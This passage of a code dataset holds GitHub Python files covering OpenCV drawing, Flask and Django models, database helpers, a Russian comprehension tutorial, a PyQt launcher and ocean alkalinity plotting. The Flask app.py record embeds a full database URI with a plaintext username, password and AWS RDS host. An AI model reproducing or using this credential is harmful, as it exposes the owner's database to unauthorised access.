300), (155, 100, 10), 5)\n\n# Draw a circle\n\ncv2.circle(img, (225, 335), 100,(0,100, 25) , -1 )\n\n# Draw a polygon\n\npts = np.array([[10, 10], [25, 30], [50, 65], [70, 80], [80, 10]], np.int32)\ncv2.polylines(img, [pts], True, (200,15,100))\n\n# Write a text in the image\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'Kingfisher image', (1,100), font, 1, (201, 222, 100), 2, cv2.LINE_AA)\n\n# plotting from cv2\n\ncv2.imshow('image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"Nirkan/Computer-Vision-Python","sub_path":"OpenCV-Tutorials/opcv3.py","file_name":"opcv3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"75354972691","text":"import os\nfrom pdb import set_trace\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import render_template\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nimport pdb\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgres://imperial:imperial-fdt-online-2019-colossal-shelf@imperial-2021.ckp3dl3vzxoh.eu-west-2.rds.amazonaws.com:5432/dvdrental\"\ndb = SQLAlchemy(app)\n\n\n\nclass Inventory(db.Model):\n film_id = db.Column(db.Integer(), primary_key=True)\n inventory_id = db.Column(db.Integer(), ForeignKey('film.film_id'))\n store_id = db.Column(db.Integer())\n\n def __repr__(self):\n return 'Inventory ID: '+str(self.inventory_id)\n\nclass Film(db.Model):\n __tablename__ = 'film'\n film_id = db.Column(db.Integer, primary_key=True)\n\n title = db.Column(db.String(255), index=True, unique=True)\n description = db.Column(db.String())\n\n copies = relationship('Inventory')\n\n\n def __repr__(self):\n return 'FILM: title is ' + self.title\n\n\n\n\n@app.route('/')\n@app.route('/index')\ndef 
index():\n return \"Hello, World?\"\n\n\n\n\n\n@app.route('/films')\ndef films():\n films = Film.query.all()\n\n # print(films[0].description)\n\n return render_template('films.html', films = films)\n\n\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n\n","repo_name":"PrashantLonikar/assignment5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33970922302","text":"def json_prep(items):\n \"\"\"Convert a model-type object into a JSON-serializable object.\n\n Keyword Arguments:\n items -- the model-type object to be converted.\n \"\"\"\n\n # If the object is a list, convert it to a list of dictionaries.\n if isinstance(items, type([])):\n prepped = []\n for item in items:\n prepped_item = {\n 'id': item.id,\n 'name': item.name,\n 'sport': item.sport,\n 'category': item.category,\n 'description': item.description,\n 'date': item.date,\n 'user': item.user.username\n }\n prepped.append(prepped_item)\n return {'items': prepped}\n\n # If the object is not a list, convert it to a dictionary.\n else:\n prepped = {\n 'id': items.id,\n 'name': items.name,\n 'sport': items.sport,\n 'category': items.category,\n 'description': items.description,\n 'date': items.date,\n 'user': items.user.username\n }\n return {'item': prepped}\n","repo_name":"davidhammaker/Item_Catalog","sub_path":"item_catalog/jsons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5774877610","text":"from django.db import models\nfrom edc_base.model_mixins import BaseUuidModel\nfrom edc_base.sites.site_model_mixin import SiteModelMixin\n\nfrom .contracting import Contracting\n\n\nclass JobPerformanceKpa(BaseUuidModel, SiteModelMixin, models.Model):\n\n contracting = models.ForeignKey(\n Contracting,\n on_delete=models.PROTECT)\n\n key_performance_area = models.CharField(\n verbose_name='KEY PERFORMANCE AREAS',\n max_length=100)\n\n kpa_tasks = models.TextField(\n verbose_name='TASKS',\n max_length=1000)\n\n kpa_performance_indicators = models.TextField(\n verbose_name='PERFORMANCE INDICATORS'\n '(completion dates)',\n max_length=1000)\n\n skills_required = models.TextField(\n verbose_name=\"SKILLS REQUIRED\",\n max_length=100)\n\n class Meta:\n verbose_name = 'Job Performance KPA'\n verbose_name_plural = 'Job Performance KPA'\n","repo_name":"Botswana-Harvard-Utility-Systems/bhp-personnel","sub_path":"bhp_personnel/models/job_performance_kpa.py","file_name":"job_performance_kpa.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5124537764","text":"from sqlalchemy import case\nfrom flaskapp.models import Restaurant, MenuItem, Courses\nfrom flaskapp import db\n\n\nclass DBAccess:\n @staticmethod\n def getRestaurant(restaurantId: int) -> Restaurant:\n return db.session.query(Restaurant) \\\n .filter_by(id=restaurantId).first()\n\n @staticmethod\n def getMenuItem(menuId: int) -> MenuItem:\n return db.session.query(MenuItem).filter_by(id=menuId).first()\n\n @staticmethod\n def getRestaurants():\n return db.session.query(Restaurant).order_by(Restaurant.name)\n \n @staticmethod\n def getCourses(restaurantId: int):\n sort_order = case(value=MenuItem.course, whens=Courses)\n return 
db.session.query(MenuItem.course).distinct().filter_by(\n restaurant_id=restaurantId).order_by(sort_order)\n\n @staticmethod\n def getMenuItems(restaurantId: int):\n return db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId)\n\n @staticmethod\n def getMenuItemsByCourse(restaurantId: int):\n return [(course[0], db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId,\n course=course[0]))\n for course\n in DBAccess.getCourses(restaurantId)]\n\n @staticmethod\n def createNewRestaurant(name: str):\n new_restaurant = Restaurant(\n name=name)\n db.session.add(new_restaurant)\n db.session.commit()\n\n @staticmethod\n def createNewMenuItem(restaurantId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n new_menu_item = MenuItem(\n name=name,\n price=price,\n description=description,\n restaurant_id=restaurantId,\n course=course,\n )\n db.session.add(new_menu_item)\n db.session.commit()\n\n @staticmethod\n def renameRestaurant(restaurantId: int, name: str):\n restaurant = DBAccess.getRestaurant(restaurantId)\n restaurant.name = name\n db.session.commit()\n\n @staticmethod\n def editMenuItem(menuId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n menu_item = DBAccess.getMenuItem(menuId=menuId)\n menu_item.name = name\n menu_item.price = price\n menu_item.description = description\n menu_item.course = course\n db.session.commit()\n\n @staticmethod\n def deleteRestaurant(restaurantId: int):\n db.session.delete(DBAccess.getRestaurant(restaurantId))\n db.session.commit()\n\n @staticmethod\n def deleteMenuItem(menuId: int):\n db.session.delete(DBAccess.getMenuItem(menuId=menuId))\n db.session.commit()\n","repo_name":"hgihem/FlaskTutorial","sub_path":"flaskapp/database_access.py","file_name":"database_access.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6496892371","text":"'''Comprehension'''\n# синтаксический сахар - упращение кода\n\n# генерация последовательности в одну строку используя цикл (синтаксический сахар)\n\n# list, set, dict\n'''Синтаксис'''\n# result for element in iterable_object\n# result for element in iterable_object if filter \n\n'''====== LIst comprehension ======'''\n''' Упрощенный подход к созданию списка, задействует цикл for и if-else. Работает быстрее чем обычный'''\n# \n\n''' for '''\n# list_=[]\n# for i in range(11):\n# list_.append(i)\n# print(list_)\n\n# a=list((i for i in range(11)))\n# print(a)\n\n# list_=[i for i in range(11)]\n# print(list_)\n# '''#\n'''засекаем время'''\n# import time\n# start_time= time.time()\n\n# list_=[]\n# for i in range(100000):\n# list_.append(i)\n# time1= time.time()- start_time\n\n# start_time = time.time()\n# list_2=[i for i in range(11)]\n# time2= time.time()- start_time\n# print( time1, time2)\n\n''' if '''\n# \n# list_=[]\n# for i in range(11):\n# if i%2==0:\n# list_.append(i)\n# print(list_)\n\n# list_2=[i for i in range(11) if i%2==0]\n# print(list_2)\n# \n\n# list_2=[i for i in range(0,11,2)]\n# print(list_2)\n\n# list_2=[i for i in range(11) if not i%2]\n# print(list_2)\n\n\n# a=['hello'for i in range(10)]\n# print(a) #['hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello']\n\n# print([input() for i in range(2)]) на каждой итерации запрашивает ввод(input)\n\n''' if- else . 
Если в условии нужен else, то все условие пишется перед for'''\n# list_2=[i if not i%2 else 'hello' for i in range(11) ]\n# print(list_2) #[0, 'hello', 2, 'hello', 4, 'hello', 6, 'hello', 8, 'hello', 10]\n'''задача '''\n# list_1 =[1,'hello', 3, 'a', 4.0, 6, 8, 'hw']\n# l=['четное' if i%2==0 else 'нечетное' for i in list_1 if type(i)==int or type(i)== float]\n# print(l) #['нечетное', 'нечетное', 'четное', 'четное', 'четное']\n\n\n\n''' set comprehension'''\n# почти тоже самое как и представление списков(list comprehension)\n# Используются {} скобки, не содержит дубликатов, не гарнтирует сохранность элементов в порядке\n\n# list_=[1,2,3,4,5,4,5,3,2]\n# set_={i for i in list_}\n# print(set_) #{1, 2, 3, 4, 5}\n\n# set_= set()\n# for i in list_:\n# set_.add(i)\n# print(set_)\n\n''' dict comprehension'''\n# необходимо дополнительно определить ключ\n\n# dict_={i: i for i in range(10)}\n# print(dict_) #{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9}\n\n# dic={}\n# for i in range(10):\n# dic.update({i: i**2})\n# print(dic) #{0: 0, 1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64, 9: 81}\n\n# l=[1,1,2,3,2,2,3,4,5]\n# li={i: l.count(i) for i in l}\n# print(li) #{1: 2, 2: 3, 3: 2, 4: 1, 5: 1}\n\n# d={'a':2, 'b':3}\n# l={k: 'четное' if v%2==0 else 'нечетное' for k,v in d.items() }\n# print(l) #{'a': 'четное', 'b': 'нечетное'}\n'''создать словарь, где ключи- это числа от 1 до 10, а значения эти же числа в виде строки'''\n# d={i: str(i) for i in range(1,11)}\n# print(d)\n\n''''''\n# l1=[1,2,3,4,5]\n# l2=['a','b','c','d','e']\n# d={ l1[i]: l2[i] for i in range(len(l1))}\n# print(d) #{1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e'}\n\n\n''' вложенные comprehension'''\n# d={i: list(range(1,i+1)) for i in range(1,6)}\n# print(d)\n\n# d={i: [j for j in range(1,i+1)] for i in range(1,6)} # вложенность\n# print(d)\n\n''''''\n# l=[['hello world' for i in range(5)] for j in range(10)]\n# print(l)\n\nemployees = {\n 'id1': {\n 'first name': 'Александр',\n 'last name' : 'Иванов',\n 'age': 30,\n 'job':'программист'\n },\n 'id2': {\n 'first name': 'Ольга',\n 'last name' : 'Петрова',\n 'age': 35,\n 'job':'ML-engineer'\n }}\n# for info in employees.values():\n# for k,v in info.items():\n# if k=='age':\n# info[k] = float(v)\n# print(employees)\n\n# print({id_: {k: float(v) if k=='age' else v for k,v in info.items()} for id_, info in employees.items()})\n# # info == {k: float(v) if k=='age' else v for k,v in info.items()}","repo_name":"clara8luna/lessons_py_27_ev","sub_path":"comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28848963243","text":"class Solution:\n def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:\n \n if not timeSeries: return 0\n \n poisoned_time = 0\n for i in range(len(timeSeries)-1):\n poisoned_time += min(duration, timeSeries[i+1] - timeSeries[i])\n \n return poisoned_time + duration\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2020-09/26-Teemo-Attacking.py","file_name":"26-Teemo-Attacking.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"31482701896","text":"from django.contrib.sites.shortcuts import get_current_site\n\n\nclass SiteFilteredViewMixin(object):\n\n site_field = 'site'\n\n def get_queryset(self):\n qs = super(SiteFilteredViewMixin, 
self).get_queryset()\n kwargs = {\n self.site_field: get_current_site(self.request),\n }\n return qs.filter(**kwargs)\n","repo_name":"fdemmer/airavata","sub_path":"airavata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72764200210","text":"from PyQt5 import QtWidgets, uic, QtCore\nimport sys, os, glob, json\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('UiTOF.ui', self) # Load the .ui file\n self.searchB.clicked.connect(self.click_s)\n self.exeB.clicked.connect(self.exe)\n self.scrfold = (\"/home/mgiacalo/GitHub/\",\"/home/mgiacalo/alice/alidist/\")\n self.diction = {}\n paths, names = self.getFiles()\n dictL = {names[i]: paths[i] for i in range(len(paths))}\n self.setupDict(dictL)\n names.sort()\n self.fillCombo(names)\n\n self.show() # Show the GUI\n \n def fillCombo(self, fill):\n self.comboBox.addItems(fill) \n\n def click_s(self):\n index = self.comboBox.findText(self.lsearch.text(), QtCore.Qt.MatchFixedString|QtCore.Qt.MatchContains)\n if index != -1:\n self.comboBox.setCurrentIndex(index)\n else: \n self.lsearch.setText(\"Not FOUND\") \n\n def setupDict(self, Dict):\n self.diction = Dict\n\n def exe(self):\n print(self.diction[self.comboBox.currentText()]) \n\n def getFiles(self):\n paths = []\n names = []\n for fol in self.scrfold:\n os.chdir(fol)\n for file in glob.glob(\"*.sh\"):\n paths.append(fol + file)\n names.append(file) \n return paths, names \n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_() ","repo_name":"jackal1-66/UiTOF","sub_path":"UiTOF_V3.py","file_name":"UiTOF_V3.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34714430087","text":"import xarray as xr\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib as mpl\nimport seaborn as sns\nfrom datetime import datetime\nfrom pandas.plotting import register_matplotlib_converters\n\nsns.set()\nregister_matplotlib_converters()\n\n# sets up pandas table display\npd.set_option('display.width', 500)\npd.set_option('display.max_columns', 100)\npd.set_option('display.notebook_repr_html', True)\npd.options.mode.chained_assignment = None\nfont = {'family': 'normal',\n 'weight': 'bold',\n 'size': 22}\nLNW = 2\nFNTSZ = 14\nLGNDSZ = 14\nmpl.rcParams['xtick.labelsize'] = LGNDSZ\nmpl.rcParams['ytick.labelsize'] = LGNDSZ\nSTART = '2011-01-01'\nSTOP = '2011-12-31'\nX_TEXT = 0.97\nY_TEXT = 0.98\n\nALK_VAR = 'B_C_Alk'\nALKFLUX_VAR = 'B_C_Alk _flux'\n\n\ndef addseason(datestring):\n \"\"\"Classifies season\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n if 2 < item.month < 6:\n return 'spring'\n elif 5 < item.month < 9:\n return 'summer'\n elif 8 < item.month < 12:\n return 'autumn'\n else:\n return 'winter'\n\n\ndef addmonth(datestring):\n \"\"\"Classifies month\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n year = {1: 'january', 2: 'february', 3: 'march', 4: 'april',\n 5: 'may', 6: 'june', 7: 'july', 8: 'august', 9: 'september',\n 10: 'october', 11: 'november', 12: 'december'}\n return year[item.month]\n\n\ndef addseconds(datestring):\n t = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n return (t - datetime(2017, 1, 1)).total_seconds()\n\n\ndef 
addsecondstolvl(datestring):\n datestring = datestring[0:-4]\n t = datetime.strptime(datestring, \"%d/%m/%Y %H:%M:%S\")\n return (t - datetime(2017, 1, 1)).total_seconds()\n\n\ndef addband(longitude):\n if 6.95 < longitude < 7:\n return 1\n else:\n return 0\n\n\ndef addphase(seconds):\n period = (12 * 60 * 60) + (25.2 * 60)\n half_period = period / 2\n startphase = (half_period / 12) * 8\n modulus = (seconds - startphase) % period\n if modulus < half_period:\n return 'low'\n else:\n return 'high'\n\n\ndef addphase_2(slev):\n if slev > 0:\n return 'high'\n else:\n return 'low'\n\n\ndef commafix(string):\n return float(string.replace(',', '.'))\n\n\ndef calculateTA(method, t, s):\n if method == 'Bellerby':\n if s >= 34.65:\n return 66.96 * s - 36.803 # Bellerby & Canoba\n else:\n return 3887 - 46.25 * s # Borges & Frankignoulle & Canoba\n elif method == 'Millero':\n if t < 20:\n return (s / 35 * (2291 - 2.69 * (t - 20)\n - 0.046 * np.square(t - 20)))\n else:\n return 520.1 + 51.24 * s # Millero et al, MarChem, 1998\n\n\ndef treatlvl(sealvldata):\n sealvldata['Seconds_since_start_of_the_year'] \\\n = sealvldata.TIME.map(addsecondstolvl)\n try:\n sealvldata['SLEV'] = sealvldata.SLEV.map(commafix)\n except AttributeError:\n pass\n sealvldata = sealvldata[sealvldata.SLEV.values[:] != -999]\n sealvldata['Phase'] = sealvldata.SLEV.map(addphase_2)\n return sealvldata\n\n\ndef treatbiogeodata(biogeodata):\n \"\"\"Process the data\"\"\"\n biogeodata['Season'] = biogeodata.Datetime.map(addseason)\n biogeodata['Month'] = biogeodata.Datetime.map(addmonth)\n biogeodata['Seconds_since_start_of_the_year'] \\\n = biogeodata.Datetime.map(addseconds)\n biogeodata['TAfromS'] = [calculateTA('Millero', t, s)\n for t, s in zip(biogeodata.Temperature.values,\n biogeodata.Salinity.values)]\n return biogeodata\n\n\ndef addlvlphase(biogeodata, sealvldata):\n \"\"\"Biogeodata and sealvldata for the current month\"\"\"\n biogeodata['SLEV'] \\\n = [np.interp(x,\n sealvldata.Seconds_since_start_of_the_year.values,\n sealvldata.SLEV.values)\n for x in biogeodata.Seconds_since_start_of_the_year.values]\n biogeodata['Phase'] = biogeodata.SLEV.map(addphase_2)\n return biogeodata\n\n\ndef returndate(datestring):\n return datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n\n\ndef cm2inch(*tupl):\n inch = 2.54\n if isinstance(tupl[0], tuple):\n return tuple(i/inch for i in tupl[0])\n else:\n return tuple(i/inch for i in tupl)\n\n\ndef plotTA(biogeodata):\n fig, ax = plt.subplots(figsize=(12, 5), constrained_layout=True)\n Time = biogeodata.Datetime.map(returndate).values\n TA = biogeodata.TA.values\n TAfromS = biogeodata.TAfromS.values\n size = FNTSZ\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax.scatter(Time, TA, label='Total Alkalinity, measured', s=size)\n ax.scatter(Time, TAfromS,\n label='Total Alkalinity, calculated from salinity',\n s=size)\n for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +\n ax.get_xticklabels() + ax.get_yticklabels()):\n item.set_fontsize(FNTSZ)\n ax.legend(loc='upper left', fontsize=LGNDSZ)\n plt.ylabel('Total Alkalinity, $\\mu M$')\n plt.show()\n\n\ndef plot_intro():\n north7 = pd.read_csv(\"data/HafniaDataNorth7Shamil.csv\")\n north7 = treatbiogeodata(north7)\n plotTA(north7)\n\n\ndef get_data_time(dtsts):\n alk_year, alkflux_bottom_year = [], []\n\n for i, ds in enumerate((dtsts), start=0):\n alk_df = ds[ALK_VAR].to_dataframe()\n alkflux_df = ds[ALKFLUX_VAR].to_dataframe()\n alk = alk_df.groupby('z').get_group(0.625).reset_index('z', drop=True)\n alkflux_bottom = 
alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n\n alk_year.append(alk[START:STOP])\n alkflux_bottom_year.append(alkflux_bottom[START:STOP])\n alk_year[i] = alk_year[i].reset_index()\n alkflux_bottom_year[i] = alkflux_bottom_year[i].reset_index()\n alk_year[i][ALK_VAR] = alk_year[i][ALK_VAR]-alk_year[i][ALK_VAR].min()\n\n return alk_year, alkflux_bottom_year\n\n\ndef plot_alkalinity_flux_low_high():\n base_path = 'data/results'\n ds1 = xr.open_dataset('{}/2_po75-25_di1e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/3_po75-25_di2e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/4_po75-25_di5e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/5_po75-25_di10e-9/water.nc'.format(base_path))\n ds5 = xr.open_dataset('{}/6_po75-25_di15e-9/water.nc'.format(base_path))\n ds6 = xr.open_dataset('{}/7_po75-25_di20e-9/water.nc'.format(base_path))\n ds7 = xr.open_dataset('{}/8_po75-25_di25e-9/water.nc'.format(base_path))\n ds8 = xr.open_dataset('{}/9_po75-25_di30e-9/water.nc'.format(base_path))\n ds9 = xr.open_dataset('{}/10_po75-25_di35e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds1, ds2, ds3, ds4, ds5,\n ds6, ds7, ds8, ds9])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(2, 1, 1)\n ax1 = fig.add_subplot(2, 1, 2)\n\n labels = [r'$1e-9$', r'$2e-9$', r'$5e-9$', r'$10e-9$', r'$15e-9$',\n r'$20e-9$', r'$25e-9$', r'$30e-9$', r'$35e-9$']\n\n for n in range(0, 9):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax.legend(loc='best', title='$kz_{dispersion}$, m$^2$ s$^{-1}$',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alkalinity_flux_sulfur_oxidation():\n\n ds0 = xr.open_dataset('data/different_sulfur_oxidation/high/water.nc')\n ds1 = xr.open_dataset('data/different_sulfur_oxidation/low/water.nc')\n ds2 = xr.open_dataset('data/different_sulfur_oxidation/regular/water.nc')\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2])\n\n fig = plt.figure(figsize=cm2inch(30, 10))\n ax = fig.add_subplot(1, 2, 1)\n ax1 = fig.add_subplot(1, 2, 2)\n\n labels = ['high', 'low', 'base']\n for n in range(0, 3):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax.legend(loc='upper left', title='Sulfur compounds \\noxidation rates',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n 
plt.show()\n\n\ndef plot_alkalinity_flux_porosities1_2_3():\n\n base_path = 'data/different_porosities'\n ds0 = xr.open_dataset('{}/4_po45-25_di10e-9/water.nc'.format(base_path))\n ds1 = xr.open_dataset('{}/0_po55-25_di10e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/1_po65-25_di10e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/3_po85-25_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_2'\n ds0_2 = xr.open_dataset('{}/0_po75-05_di10e-9/water.nc'.format(base_path))\n ds1_2 = xr.open_dataset('{}/1_po75-15_di10e-9/water.nc'.format(base_path))\n ds2_2 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_2 = xr.open_dataset('{}/3_po75-35_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_3'\n ds0_3 = xr.open_dataset('{}/0_po63-32_di10e-9/water.nc'.format(base_path))\n ds1_3 = xr.open_dataset('{}/1_po70-28_di10e-9/water.nc'.format(base_path))\n ds2_3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_3 = xr.open_dataset('{}/3_po82-21_di10e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2, ds3, ds4])\n alk_year_2, alkflux_bottom_year_2 = get_data_time([ds0_2, ds1_2,\n ds2_2, ds3_2])\n alk_year_3, alkflux_bottom_year_3 = get_data_time([ds0_3, ds1_3,\n ds2_3, ds3_3])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(3, 2, 1)\n ax1 = fig.add_subplot(3, 2, 2)\n ax_2 = fig.add_subplot(3, 2, 3)\n ax1_2 = fig.add_subplot(3, 2, 4)\n ax1_3 = fig.add_subplot(3, 2, 6)\n ax_3 = fig.add_subplot(3, 2, 5)\n\n labels = ('0.45-0.25', '0.55-0.25', '0.65-0.25', '0.75-0.25', '0.85-0.25')\n labels_2 = ('0.75-0.05', '0.75-0.15', '0.75-0.25', '0.75-0.35')\n labels_3 = ('0.63-0.32', '0.70-0.28', '0.75-0.25', '0.82-0.21')\n\n for n in range(0, 5):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n]['B_C_Alk _flux'],\n linewidth=LNW, alpha=1, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n]['B_C_Alk'],\n linewidth=LNW, label=labels[n])\n\n for n in range(0, 4):\n ax_2.plot(alkflux_bottom_year_2[n]['time'],\n alkflux_bottom_year_2[n]['B_C_Alk _flux'],\n linewidth=LNW, label=labels_2[n])\n ax1_2.plot(alk_year_2[n]['time'], alk_year_2[n]['B_C_Alk'],\n linewidth=LNW, label=labels_2[n])\n\n ax_3.plot(alkflux_bottom_year_3[n]['time'],\n alkflux_bottom_year_3[n]['B_C_Alk _flux'],\n linewidth=2, label=labels_3[n])\n ax1_3.plot(alk_year_3[n]['time'], alk_year_3[n]['B_C_Alk'],\n linewidth=LNW, label=labels_3[n])\n\n for axis in [ax, ax1, ax_2, ax1_2, ax_3, ax1_3]:\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n for axis in [ax, ax_2, ax_3]:\n axis.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n axis.set_ylim(0, 27)\n\n for axis in [ax1, ax1_2, ax1_3]:\n axis.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n axis.legend(loc='upper left',\n title='Porosities:\\n SWI - \"infinite depth\"',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n axis.set_ylim(0, 180)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)', '(C) ', '(D)', '(E)', '(F)')\n for i, axis in enumerate((ax, ax1, ax_2, ax1_2, ax_3, ax1_3)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alk_sulfur_fluxes():\n\n ds1 = xr.open_dataset('data/results/2_po75-25_di1e-9/water.nc')\n ds2 = 
xr.open_dataset('data/results/3_po75-25_di2e-9/water.nc')\n ds3 = xr.open_dataset('data/results/4_po75-25_di5e-9/water.nc')\n ds4 = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n def get_var_data_time(dtsts, varname):\n varflux_bottom_july, var_mean = [], []\n for i, ds in enumerate(dtsts, start=0):\n varflux_df = ds[varname].to_dataframe()\n varflux_bottom = varflux_df.groupby('z_faces').get_group(2.5)\n varflux_bottom = varflux_bottom.reset_index('z_faces', drop=True)\n varflux_bottom_july.append(varflux_bottom['2011-07-01':\n '2011-08-01'])\n varflux_bottom_july[i] = varflux_bottom_july[i].reset_index()\n var_mean.append(varflux_bottom_july[i][varname].mean())\n return np.array(var_mean), varflux_bottom_july\n\n dtsts = [ds1, ds2, ds3, ds4]\n alk, alkflux_bottom_july = get_var_data_time(dtsts, 'B_C_Alk _flux')\n nh4, nh4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NH4 _flux')\n no2, no2flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO2 _flux')\n no3, no3flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO3 _flux')\n po4, po4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_PO4 _flux')\n so4, so4flux_bottom_july = get_var_data_time(dtsts, 'B_S_SO4 _flux')\n h2s, h2sflux_bottom_july = get_var_data_time(dtsts, 'B_S_H2S _flux')\n s0, s0flux_bottom_july = get_var_data_time(dtsts, 'B_S_S0 _flux')\n s2o3, s2o3flux_july = get_var_data_time(dtsts, 'B_S_S2O3 _flux')\n s_total = h2s + s0 